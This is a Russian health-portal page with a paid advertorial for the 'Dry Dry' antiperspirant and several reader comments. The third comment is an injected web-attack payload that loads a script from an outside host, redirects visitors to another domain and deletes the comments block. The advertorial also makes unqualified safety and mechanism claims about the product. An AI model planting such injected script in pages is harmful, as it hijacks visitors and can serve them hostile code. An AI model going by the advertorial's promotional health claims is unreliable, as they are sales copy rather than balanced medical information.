Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как избавиться от пота  >>  Как избавиться от пота
 
Обратная связь
 

Как избавиться от пота

Размер шрифта
12 февраля 2012 00:00
  • google_analytics: false
  • Нравится

Если вы страдаете повышенным потоотделением в области подмышечных впадин, ладоней и ступней, и если от температуры или физических нагрузок, это не зависит, значит, у вас гипергидроз. С этим неприятным состоянием можно справиться. Как? Читайте в нашей статье.

1

Различают первичный гипергидроз – чрезмерное потение без видимых причин, и вторичный – симптом патологии эндокринной или нервной системы, опухолевых заболеваний.

В России, долгое время эта проблема оставалась нерешенной из-за отсутствия эффективных средств, за исключением, пожалуй, ботокса.

В 2006 году на рынке появилось новое уникальное высокоэффективное шведское средство от повышенного потоотделения Драй Драй (Dry Dry).

Достоинства препарата

  • безопасность
  • нетоксичность
  • эффективность (до 7 дней)

Все это подтверждено клиническим исследованием, проведенным в 2011 году в Казанской государственной медицинской академии. Средство от повышенного потоотделения безопасно блокирует потовые железы. Излишек влаги перенаправляется к другим областям, где потоотделение не столь обильно, или же жидкость из организма выводится при помощи почек.

Препарат универсален, показан как мужчинам, так и женщинам, а отсутствие запаха делает его привлекательным среди похожих продуктов от конкурентов.

Драй Драй – это возможность стать уверенней в себе, укрепить отношения с партнером и – начать новую жизнь!
 

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

19 марта 2012 в 18:02

Цитировать   |   Пожаловаться

вот интересно: с одной стороны с экрана говорите, что обычные дезодоранты - это плохо, в них есть гидрат окиси алюминия, он токсичен, и т.д.
С другой - рекламируете это средство.

Состав и форма выпуска:
Драй Драй средство от потовыделения по 35 мл во флаконе.
Состав Драй Драй: денатурированный спирт (бутиловый спирт, денатурат), гидрат хлористого алюминия.

где же логика? или он не токсичен все же?

2 - Гость

21 марта 2012 в 19:20

Цитировать   |   Пожаловаться

Ну народ!!! Написано же: реклама! Имеются противопоказания! Проконсультируйтесь! Никаких противоречий, все правильно: на экране правда. А тут реклама и предупреждение. Все максимально прозрачно, я считаю!

3 - zzzzzz

30 июня 2015 в 23:56

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.